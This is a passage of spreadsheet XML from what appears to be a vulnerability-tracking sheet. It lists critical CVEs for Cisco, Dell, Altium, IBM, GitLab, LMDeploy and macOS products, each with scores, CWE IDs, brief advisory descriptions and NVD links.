The vulnerabilities tracked by CVE-2026-20192 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-284.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20192</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65381</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. A malicious app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65381</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70416</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>Dell ObjectScale, versions prior to 4.4.0.0, contains a Deserialization of Untrusted Data vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70416</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76423</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to gain administrative access to an affected device.
This vulnerability is due to the REST API web service being exposed with insufficient authorization checks. An attacker could exploit this vulnerability by sending a crafted HTTP request to the exposed REST API port. A successful exploit could allow the attacker to read and modify ISE configuration and identity data with administrative privileges.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76423</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92808</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>4760f414-e1ae-4ff1-bdad-c7a9c3538b79</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-918</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery (SSRF) vulnerability exists in the UnifiedLogin service of Altium Enterprise Server. An unauthenticated network attacker can cause the server to issue outbound HTTP requests to a destination of the attacker's choosing, including internal services that are reachable only from the server itself.
One such internal service exposes server configuration and credential material without authentication, relying only on the request originating locally. Because the forged requests originate from the server process, that check is satisfied. An unauthenticated attacker can therefore retrieve stored credentials and use them to obtain an administrative session, resulting in full compromise of the server and all of its services. Altium 365 cloud deployments are not affected, as the affected endpoint is disabled in cloud mode.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92808</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16338</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to perform an arbitrary file write due to improper validation of file paths.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16338</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20234</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20234 are related to insufficiently protected credentials issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-522.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20234</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20307</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have at least low-privileged administrative credentials.
This vulnerability is due to insecure deserialization of a user-supplied Java byte stream. An attacker could exploit this vulnerability by sending a crafted serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20307</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20322</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard&amp;nbsp;engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20322 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) CWE-284.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20322</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20324</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure Firewall Management Center (FMC) Software could allow an authenticated, remote attacker to execute arbitrary commands as root.
This vulnerability exists because a registered sftunnel peer has incorrect permissions to write an arbitrary file to any location on the device. An attacker could exploit this vulnerability by hijacking the sftunnel communication connection or being a valid registered sftunnel peer and sending an sftunnel command to write a malicious file to the disk of an affected device. A successful exploit could allow the attacker to write a file to the device that is executed with root privileges. To exploit this vulnerability, the attacker must have valid user credentials on the affected device.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20324</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20325</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard&amp;nbsp;engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20325 are related to improper neutralization of special elements used in a command issue that are grouped under the Common Weakness Enumeration (CWE) CWE-77.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20325</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20329</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20329 are related to issues concerning improper handling of exceptional conditions that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-703.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20329</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20330</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-707</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20330 are related to improper neutralization issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-707.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20330</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20332</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20332 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-284.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20332</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87719</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 18.3 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could allow an authenticated user with Duo Chat access to obtain Advanced Search instance configurations and sensitive credentials using a specially crafted GraphQL subscription argument to bypass serialization and perform server object lookup.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87719</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-59953</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>pip:lmdeploy</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>0.10.2</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>LMDeploy is a toolkit for compressing, deploying, and serving large language models. Starting in version 0.9.1 and prior to version 0.10.2, the LMdeploy implements an rpc server (AsyncRPCServer in zmq_rpc.py) for supporting the RPC communications. In its core functionality call_and_response(), I found it will directly use the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server. Version 0.10.2 contains a patch.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-59953</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12793</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
